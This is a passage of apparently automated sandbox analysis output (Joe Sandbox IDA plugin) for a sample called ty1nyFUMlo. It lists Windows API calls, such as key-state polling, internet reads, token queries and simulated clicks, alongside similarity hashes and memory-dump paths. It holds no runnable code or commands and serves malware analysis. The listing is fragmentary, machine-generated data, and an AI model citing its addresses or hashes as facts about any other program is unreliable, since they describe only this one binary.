• GetProcAddress.KERNEL32(00000000,?), ref: 00598FD0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00598FEC
• GetProcAddress.KERNEL32(00000000,?), ref: 00599032
• FreeLibrary.KERNEL32(00000000), ref: 00599052
  • Part of subcall function 0052F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00581043,?,75B8E610), ref: 0052F6E6
  • Part of subcall function 0052F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0056FA64,00000000,00000000,?,?,00581043,?,75B8E610,?,0056FA64), ref: 0052F70D
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: 30bd0609d7893bdcba96d7795368c2ecc48da038254d8f637e30759a0fe88f98
• Instruction ID: fbbef9e352b1613c8fa91f9117b92fae8a2c555a3f6b240144b2c7ccdc133f01
• Opcode Fuzzy Hash: 30bd0609d7893bdcba96d7795368c2ecc48da038254d8f637e30759a0fe88f98
• Instruction Fuzzy Hash: F9511735600205DFDB11DF58C4988A9BFF1FF8A314F0980A8E81A9B362DB31ED85CB90
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 40dac34452c29d3d285367ec9e7711878103222d4d833ecea8f4a32398d386d7
• Instruction ID: 183b748e96f74ac567f286ee50b1371f51938626959f1d6d97846b07228f91e5
• Opcode Fuzzy Hash: 40dac34452c29d3d285367ec9e7711878103222d4d833ecea8f4a32398d386d7
• Instruction Fuzzy Hash: 5E41E432A002109FCB24DF78C884A9EBBF5FF89318F554569F515EB396D631AD01DB80
APIs
• GetCursorPos.USER32(?), ref: 00529141
• ScreenToClient.USER32(00000000,?), ref: 0052915E
• GetAsyncKeyState.USER32(00000001), ref: 00529183
• GetAsyncKeyState.USER32(00000002), ref: 0052919D
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 9265c970efff0707028236a189c98b5f60c89f4a6111d25c2623092567dad064
• Instruction ID: 9d2a1fbd3cd9d4703fec7a0be231ebe00589e17911c06a0eb440ed85d9f8d19a
• Opcode Fuzzy Hash: 9265c970efff0707028236a189c98b5f60c89f4a6111d25c2623092567dad064
• Instruction Fuzzy Hash: 1D415F7190861BBBDF159F69D848BEEBB74FF4A324F20421AE425A32D0C7305D54DB91
APIs
• GetInputState.USER32 ref: 005838CB
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00583922
• TranslateMessage.USER32(?), ref: 0058394B
• DispatchMessageW.USER32(?), ref: 00583955
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00583966
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
• Opcode ID: 4503aef7a4387d5955e546e11e77a2924c56c79e8e0bc290dd450717327f6e5b
• Instruction ID: 4f7c704a049fd1d16365d79e5dc282e96174174b464351dbbf9ba9575ee632fa
• Opcode Fuzzy Hash: 4503aef7a4387d5955e546e11e77a2924c56c79e8e0bc290dd450717327f6e5b
• Instruction Fuzzy Hash: 5931EB709057819EEB39EF34D849BB63FA8FB15700F04056DECA6E60A0E7F49689DB11
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 0058CF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFB4
• SetEvent.KERNEL32(?,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFC8
• SetEvent.KERNEL32(?,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFF2
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: 9db23ff94507e323a1f89a2ae4c331dd96a991a506b04267b0be03a8d006850d
• Instruction ID: 8ef22b1384aa3925981837eb9b4bbcd1e2dfa31eb94be813000d1238b4842efa
• Opcode Fuzzy Hash: 9db23ff94507e323a1f89a2ae4c331dd96a991a506b04267b0be03a8d006850d
• Instruction Fuzzy Hash: 55314C71604205AFEB20EFA5D884AABBFF9FF15354B10442EFA06E2141DB30AE44DB70
APIs
• GetWindowRect.USER32(?,?), ref: 00571915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 005719C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 005719C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 005719DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 005719E2
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 4690d1f04d452f7130f5e8eda3d6dce698ed176c45c72cb382b4a5dfd1410890
• Instruction ID: 3486ec42c9f545e93dc0979e5a5cae22f7656c2c3d0fa965b371baba725cc6ab
• Opcode Fuzzy Hash: 4690d1f04d452f7130f5e8eda3d6dce698ed176c45c72cb382b4a5dfd1410890
• Instruction Fuzzy Hash: 1A31CD71A00219EFCB00CFACD998ADE3FB5FB55314F108229FA25AB2D0C7709945EB90
APIs
• IsWindow.USER32(00000000), ref: 00590951
• GetForegroundWindow.USER32 ref: 00590968
• GetDC.USER32(00000000), ref: 005909A4
• GetPixel.GDI32(00000000,?,00000003), ref: 005909B0
• ReleaseDC.USER32(00000000,00000003), ref: 005909E8
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0054CDC6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0054CDE9
  • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0054CE0F
• _free.LIBCMT ref: 0054CE22
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0054CE31
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
• SelectObject.GDI32(?,00000000), ref: 005296A2
• BeginPath.GDI32(?), ref: 005296B9
• SelectObject.GDI32(?,00000000), ref: 005296E2
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
• GetLastError.KERNEL32(?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6), ref: 00542DFD
• _free.LIBCMT ref: 00542E32
• _free.LIBCMT ref: 00542E59
• SetLastError.KERNEL32(00000000,00511129), ref: 00542E66
• SetLastError.KERNEL32(00000000,00511129), ref: 00542E6F
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?,?,0057035E), ref: 0057002B
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570046
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570054
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?), ref: 00570064
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570070
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 0057E997
• QueryPerformanceFrequency.KERNEL32(?), ref: 0057E9A5
• Sleep.KERNEL32(00000000), ref: 0057E9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 0057E9B7
• Sleep.KERNEL32 ref: 0057E9F3
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
• GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 842720411-0
                                                                                                                        • Opcode ID: f6a2cf74d7a01e6596447bdf6e8af8dfe1c6b489c74989028028e8569a8ae2f5
                                                                                                                        • Instruction ID: c6136f9fc9b8287e4255750945e0d6448a2bf261b42c9600f0abccdcd726c832
                                                                                                                        • Opcode Fuzzy Hash: f6a2cf74d7a01e6596447bdf6e8af8dfe1c6b489c74989028028e8569a8ae2f5
                                                                                                                        • Instruction Fuzzy Hash: 08011975200605BFDB114FA9EC49A6A3F6EFF8A3A0B604419FA45D7360DA31DD04EA60
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00570FCA
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00570FD6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00570FE5
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00570FEC
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00571002
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: c45069ca284d4fd7f6399ac621f8fbb70e8bc9340150943286064622f09ba86d
                                                                                                                        • Instruction ID: fb6028b963192fc27c0e25af8a7c0bd5262cba8585d98445d484def58dba836d
                                                                                                                        • Opcode Fuzzy Hash: c45069ca284d4fd7f6399ac621f8fbb70e8bc9340150943286064622f09ba86d
                                                                                                                        • Instruction Fuzzy Hash: 7CF04935200701ABDB214FA9AC4DF5A3FADFF9A762F104415FA49C6251EE70DC54AA60
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0057102A
                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00571036
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571045
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0057104C
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571062
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: d5f4b3ebc07cdc12eb6636ac184be9f7786526de063174e18f9b7b78d1e892d5
                                                                                                                        • Instruction ID: 2fa8470c3eb9a693007dc5b96c8b49590f76c8b5d46856077688edcdbde6c1f6
                                                                                                                        • Opcode Fuzzy Hash: d5f4b3ebc07cdc12eb6636ac184be9f7786526de063174e18f9b7b78d1e892d5
                                                                                                                        • Instruction Fuzzy Hash: 9DF04935200701ABDB215FAAEC4DF5A3FADFF9A761F104415FA49C6250DE70D854AA60
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580324
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580331
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 0058033E
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 0058034B
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580358
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580365
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: 7834c3ed929462e4082d5966cb35c3af576849a463b1935eef56009c7957ac67
                                                                                                                        • Instruction ID: 63279650871853044fdf335bb996c966c14b476cf46726462eed549cd631cf13
                                                                                                                        • Opcode Fuzzy Hash: 7834c3ed929462e4082d5966cb35c3af576849a463b1935eef56009c7957ac67
                                                                                                                        • Instruction Fuzzy Hash: 10019C72801B159FCB30AF66D880816FBF9BE602163159E3FD19662971CBB1A958DF80
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0054D752
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 0054D764
                                                                                                                        • _free.LIBCMT ref: 0054D776
                                                                                                                        • _free.LIBCMT ref: 0054D788
                                                                                                                        • _free.LIBCMT ref: 0054D79A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 0e09515219e6085af8511fe0c43ee2f152e8a18f32f9bde6045214b719798093
                                                                                                                        • Instruction ID: 13e23af86243c5d14f9ed30e9a6b8df4a749c514032d72bdaff7f8b76eb33a5f
                                                                                                                        • Opcode Fuzzy Hash: 0e09515219e6085af8511fe0c43ee2f152e8a18f32f9bde6045214b719798093
                                                                                                                        • Instruction Fuzzy Hash: 46F04F32541216AB8621EB65F9C5D967FFDFB44318BD40806F049D7502C734FC809670
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00575C58
                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00575C6F
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00575C87
                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00575CA3
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00575CBD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3741023627-0
                                                                                                                        • Opcode ID: ac88b2363bdaaa7499b7834fec45fe70df19d3109fe8213ee3b6bd6814aee176
                                                                                                                        • Instruction ID: fb1d42a86d788f89ca4a9de9a2f5bc9cf14a09e9d727cd8c61a7b81790096234
                                                                                                                        • Opcode Fuzzy Hash: ac88b2363bdaaa7499b7834fec45fe70df19d3109fe8213ee3b6bd6814aee176
                                                                                                                        • Instruction Fuzzy Hash: 88018630500B04ABEB215B14ED4EFA67FFCBB11B05F044559A587A20E1EBF0AD88AA90
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 005422BE
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 005422D0
                                                                                                                        • _free.LIBCMT ref: 005422E3
                                                                                                                        • _free.LIBCMT ref: 005422F4
                                                                                                                        • _free.LIBCMT ref: 00542305
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 6a2b031925cebc4a2d359f9b5ac1a6920efaee68420e7bb23758ae22cf4c424d
                                                                                                                        • Instruction ID: 6e6b9053c052ea30b8df7a7fa076dd89f6a959f781c5bc0cc975154efe4965d6
                                                                                                                        • Opcode Fuzzy Hash: 6a2b031925cebc4a2d359f9b5ac1a6920efaee68420e7bb23758ae22cf4c424d
                                                                                                                        • Instruction Fuzzy Hash: 66F0B4784015B29B8A26AF56BC8188C3F74F738764F801107F058DA2B1C7710496FFE8
                                                                                                                        APIs
                                                                                                                        • EndPath.GDI32(?), ref: 005295D4
                                                                                                                        • StrokeAndFillPath.GDI32(?,?,005671F7,00000000,?,?,?), ref: 005295F0
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00529603
                                                                                                                        • DeleteObject.GDI32 ref: 00529616
                                                                                                                        • StrokePath.GDI32(?), ref: 00529631
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2625713937-0
                                                                                                                        • Opcode ID: 1de2066f372abafc33b299c12c1ac75a756c330819fcff9d7bc5cd86e80e004b
                                                                                                                        • Instruction ID: 200df3aa9b78b2f16348f5e6e0a2d62ff1a6f020dfa8d45f27de7e33c17c2d95
                                                                                                                        • Opcode Fuzzy Hash: 1de2066f372abafc33b299c12c1ac75a756c330819fcff9d7bc5cd86e80e004b
                                                                                                                        • Instruction Fuzzy Hash: 11F04F31105A48EBDB1A5F65ED5C7683FA1BF22322F048214F4A5991F2CB348999FF28
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea$_free
                                                                                                                        • String ID: a/p$am/pm
                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                        • Opcode ID: 80df0facff56a307b35277d354b267233c5c8cfe930299b035d27d01bf7ca494
                                                                                                                        • Instruction ID: b3fb87df8b0c21aec00abaf69fc268ed9dd220c54b0c1d378f7e8fd52fd1d0f7
                                                                                                                        • Opcode Fuzzy Hash: 80df0facff56a307b35277d354b267233c5c8cfe930299b035d27d01bf7ca494
                                                                                                                        • Instruction Fuzzy Hash: 40D14835900A06DBCB288F68C859BFEBFB1FF05708F244919E9169B650D3759DC0CB99
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00530242: EnterCriticalSection.KERNEL32(005E070C,005E1884,?,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053024D
                                                                                                                          • Part of subcall function 00530242: LeaveCriticalSection.KERNEL32(005E070C,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053028A
                                                                                                                          • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00596238
                                                                                                                          • Part of subcall function 005301F8: EnterCriticalSection.KERNEL32(005E070C,?,?,00528747,005E2514), ref: 00530202
                                                                                                                          • Part of subcall function 005301F8: LeaveCriticalSection.KERNEL32(005E070C,?,00528747,005E2514), ref: 00530235
                                                                                                                          • Part of subcall function 0058359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005835E4
                                                                                                                          • Part of subcall function 0058359C: LoadStringW.USER32(005E2390,?,00000FFF,?), ref: 0058360A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                        • String ID: x#^$x#^$x#^
                                                                                                                        • API String ID: 1072379062-3539263148
                                                                                                                        • Opcode ID: 75ede35975a95d81150152e86399bd8fda22f909111fe4b141f4bdf052faf4a5
                                                                                                                        • Instruction ID: b7042cb355b1f99f464c70204d58ead184cd3a5e64363a337f8234473ba18ccd
                                                                                                                        • Opcode Fuzzy Hash: 75ede35975a95d81150152e86399bd8fda22f909111fe4b141f4bdf052faf4a5
                                                                                                                        • Instruction Fuzzy Hash: 11C17B71A00106AFDF14DF98C895EAEBBB9FF48300F118469F945AB291DB70ED49CB90
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00548B6E
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00548B7A
                                                                                                                        • __dosmaperr.LIBCMT ref: 00548B81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
